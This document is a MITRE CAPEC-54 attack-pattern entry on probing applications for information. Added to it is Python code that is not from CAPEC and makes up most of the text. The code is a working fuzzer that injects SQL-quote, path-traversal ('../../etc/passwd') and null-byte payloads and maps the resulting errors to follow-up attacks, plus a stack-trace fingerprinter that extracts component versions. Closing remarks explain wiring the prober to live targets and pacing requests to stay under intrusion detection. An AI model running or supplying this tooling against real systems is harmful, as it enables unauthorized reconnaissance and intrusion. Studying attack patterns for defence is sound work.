CAPEC-54 Detail

Query System for Information

Abstraction: Standard
Domain: Software
Likelihood of Attack: High
Typical Severity: Low

Parents: 116

Children: 95 127 215 261 462

Threats: T60 T65 T258 T273 T277 T291 T302 T340 T383 T396

Description

An adversary, aware of an application's location (and possibly authorized to use the application), probes an application's structure and evaluates its robustness by submitting requests and examining responses. Often, this is accomplished by sending variants of expected queries in the hope that these modified queries might return information beyond what the expected set of queries would provide.


External ID Source Link Description
CAPEC-54 capec https://capec.mitre.org/data/definitions/54.html
CWE-209 cwe http://cwe.mitre.org/data/definitions/209.html
Explore
  1. Determine parameters: Determine all user-controllable parameters of the application either by probing or by finding documentation

Experiment
  1. Cause error condition: Inject each parameter with content that causes an error condition to manifest

  2. Modify parameters: Modify the content of each parameter according to observed error conditions

Exploit
  1. Follow up attack: Once the above steps have been repeated with enough parameters, the application will be sufficiently mapped out. The adversary can then launch a desired attack (for example, Blind SQL Injection)
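The three phases above, worked through as an added example (this is not code from CAPEC or from any real tool): a Python prober that discovers parameters, injects error-provoking payloads into one parameter at a time while holding the others at benign values, classifies each response by error signature, and turns the result into follow-up candidates. The target is `mock_app`, a constructed stand-in whose behaviour is invented for the demonstration; the signature list, payload list and follow-up mapping are likewise illustrative choices and not a CAPEC-defined set.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse, parse_qs

# Response signatures that reveal how a parameter is handled server-side (constructed list;
# a real run extends it with the target platform's own error formats).
SIGNATURES = {
    "sql_error": re.compile(
        r"You have an error in your SQL syntax|ORA-\d{5}|unterminated quoted string|SQLSyntaxErrorException",
        re.I),
    "stack_trace": re.compile(r"^\s*at [\w$.]+\([\w.]+:\d+\)", re.M),
    "path_disclosure": re.compile(r"(/var/www|/opt/|C:\\)[\w\\/.-]+"),
    "type_error": re.compile(r"NumberFormatException|invalid literal for int|TypeError", re.I),
}

# Each payload is chosen to provoke a different error class: a quote for SQL, a non-numeric
# token for type conversion, an oversized value, a traversal sequence and an encoded null byte
# for file-backed parameters.
PAYLOADS = ["'", "abc", "A" * 5000, "../../etc/passwd", "%00"]

# Which follow-up attack (Exploit step) each error class suggests (constructed mapping).
FOLLOW_UPS = {"sql_error": "sql_injection", "path_disclosure": "file_access",
              "stack_trace": "stack_trace_harvest"}


class _FormInputs(HTMLParser):
    """Collect the name= attribute of every form control in an HTML page."""
    def __init__(self):
        super().__init__()
        self.names = []

    def handle_starttag(self, tag, attrs):
        if tag in ("input", "select", "textarea"):
            name = dict(attrs).get("name")
            if name and name not in self.names:
                self.names.append(name)


def discover_parameters(url, html=""):
    """Explore step: user-controllable parameters from the query string and any forms on the page."""
    names = list(parse_qs(urlparse(url).query, keep_blank_values=True))
    parser = _FormInputs()
    parser.feed(html)
    for name in parser.names:
        if name not in names:
            names.append(name)
    return names


def classify(body):
    """Error classes whose signature appears in a response body (sorted for stable comparison)."""
    return sorted(cls for cls, rx in SIGNATURES.items() if rx.search(body))


def probe(send, base_params, params, payloads=PAYLOADS):
    """Experiment step: inject each payload into one parameter at a time, keeping the others at
    benign values, and record which error classes each parameter produces. `send` is the
    transport, a callable mapping a parameter dict to a response body."""
    findings = {}
    for name in params:
        observed = {}
        for payload in payloads:
            request = dict(base_params)
            request[name] = payload
            classes = classify(send(request))
            if classes:
                observed[payload] = classes
        findings[name] = observed
    return findings


def hypothesize(findings):
    """Exploit step: turn the observed error classes into follow-up attack candidates per parameter."""
    out = {}
    for name, observed in findings.items():
        hints = sorted({FOLLOW_UPS[c] for classes in observed.values() for c in classes if c in FOLLOW_UPS})
        if hints:
            out[name] = hints
    return out


def mock_app(q):
    """Constructed stand-in for the target (not a real application): an item servlet with an
    integer `id` looked up in a database and a `page` name resolved to a file under WEB-INF."""
    item_id = q.get("id", "1")
    if "'" in item_id:
        return "Error: You have an error in your SQL syntax near ''' at line 1"
    if not item_id.isdigit():
        return ('HTTP 500\njava.lang.NumberFormatException: For input string: "%s"\n'
                "\tat java.lang.Integer.parseInt(Integer.java:580)\n"
                "\tat com.example.shop.ItemServlet.doGet(ItemServlet.java:42)\n") % item_id
    page = q.get("page", "home")
    if ".." in page or "%00" in page:
        return "java.io.FileNotFoundException: /opt/tomcat/webapps/shop/WEB-INF/pages/%s" % page
    return "<html><body>item %s</body></html>" % item_id


if __name__ == "__main__":
    params = discover_parameters("http://shop.example/item?id=1&page=home",
                                 '<form><input name="q"><input type="hidden" name="id"></form>')
    findings = probe(mock_app, {"id": "1", "page": "home"}, params)
    for name, observed in findings.items():
        for payload, classes in observed.items():
            print("%-5s %-20r -> %s" % (name, payload[:16], ", ".join(classes)))
    print(hypothesize(findings))
```

Against a live target the `send` callable would wrap an HTTP client; the one-parameter-at-a-time loop is what makes a response attributable to a single input, and pacing those requests is what keeps the probing under the logging and intrusion-detection threshold named in the prerequisites.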

Prerequisites
  1. This class of attacks does not strictly require authorized access to the application. Because attackers use this process to classify, map, and identify vulnerable aspects of an application, it requires only hypotheses to verify, interaction with the application, and time for trial-and-error activity.
  2. The attacker needs the ability to probe application functionality and feed it erroneous directives or data without triggering intrusion detection or generating enough logging noise that steps are taken against them. The attack needs no special hardware, software, skills, or access.
Skills Required
Medium: Although fuzzing parameters is not difficult, and is often possible with automated fuzzers, interpreting the error conditions and modifying the parameters so as to move further in mapping the application requires detailed knowledge of the target platform, the languages and packages used, and the software's design.
Consequences
Confidentiality: Read Data
Example Instances
  1. Blind SQL injection is an example of this technique carried through to a successful exploit. See also: CVE-2006-4705
  2. An attacker sends bad data to various servlets in a J2EE system, records the returned exception stack traces, and maps application functionality from them. The same technique lets the attacker correlate the servlets in use with the underlying open source packages (and potentially their version numbers) that provide them.
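The second instance, as an added example that is not part of the CAPEC entry: parsing a J2EE stack trace to separate the target's own packages and entry points from frames contributed by known open source components, and pulling version strings from container banners or jar names. `SAMPLE_TRACE` is a constructed response, not one captured from a real system, and the `KNOWN` package lookup and the version patterns are illustrative assumptions.

```python
import re
from collections import Counter

# Constructed sample of what a J2EE container returns for bad input when no error page is
# configured (the CWE-209 condition this pattern exploits); not captured from a real system.
SAMPLE_TRACE = """HTTP Status 500 - Internal Server Error
javax.servlet.ServletException: java.lang.NullPointerException
\tat org.apache.struts.action.RequestProcessor.processException(RequestProcessor.java:535)
\tat org.apache.struts.action.RequestProcessor.processActionPerform(RequestProcessor.java:433)
\tat com.example.shop.action.CheckoutAction.execute(CheckoutAction.java:88)
\tat org.hibernate.impl.SessionImpl.load(SessionImpl.java:905)
\tat org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:290)
\tat org.apache.catalina.core.StandardWrapperValve.invoke(StandardWrapperValve.java:213)
note The full stack trace of the root cause is available in the Apache Tomcat/5.5.26 logs.
"""

# One "at package.Class.method(File.java:NN)" frame.
FRAME = re.compile(r"^\s*at (?P<cls>[\w$.]+)\.(?P<method>[\w$<>]+)\((?P<file>[\w.]+):(?P<line>\d+)\)", re.M)

# Package prefixes of well-known open-source components (constructed lookup; extend for the
# stack in use).
KNOWN = {
    "org.apache.struts": "Apache Struts",
    "org.apache.catalina": "Apache Tomcat (Catalina)",
    "org.hibernate": "Hibernate",
    "org.springframework": "Spring Framework",
}

# Version strings: container banners such as "Apache Tomcat/5.5.26" and, in containers that
# annotate frames with their jar, names such as "struts-core-1.3.10.jar".
BANNER = re.compile(r"\b(Apache Tomcat|JBoss|WebLogic|Jetty|GlassFish)/?\s?(\d+(?:\.\d+)+)")
JAR = re.compile(r"\b([a-z][\w-]*?)-(\d+(?:\.\d+)+)\.jar\b", re.I)


def extract_frames(trace):
    """Parse every stack frame into cls/method/file/line."""
    return [m.groupdict() for m in FRAME.finditer(trace)]


def _is_known(cls, known=KNOWN):
    return any(cls.startswith(prefix + ".") for prefix in known)


def application_packages(frames, known=KNOWN):
    """Frames outside any known component belong to the target's own code and reveal its
    package layout."""
    own = []
    for f in frames:
        if not _is_known(f["cls"], known):
            pkg = f["cls"].rsplit(".", 1)[0]
            if pkg not in own:
                own.append(pkg)
    return own


def components(frames, known=KNOWN):
    """Known components present in the trace, with how many frames each contributed."""
    hits = Counter()
    for f in frames:
        for prefix, name in known.items():
            if f["cls"].startswith(prefix + "."):
                hits[name] += 1
    return dict(hits)


def version_hints(trace):
    """Product -> version pairs recoverable from banners or jar names in the trace."""
    found = {m.group(1): m.group(2) for m in BANNER.finditer(trace)}
    found.update((m.group(1), m.group(2)) for m in JAR.finditer(trace))
    return found


def fingerprint(trace):
    """Everything one error response tells an attacker about the application behind it."""
    frames = extract_frames(trace)
    return {
        "entry_points": ["%s.%s:%s" % (f["cls"], f["method"], f["line"])
                         for f in frames if not _is_known(f["cls"])],
        "own_packages": application_packages(frames),
        "components": components(frames),
        "versions": version_hints(trace),
    }


if __name__ == "__main__":
    for key, value in fingerprint(SAMPLE_TRACE).items():
        print("%-13s %s" % (key, value))
```

Repeating this over many servlets, as the instance describes, accumulates the target's own package tree and the set of third-party components it runs on; the version strings are what turn that inventory into a list of published vulnerabilities to try next.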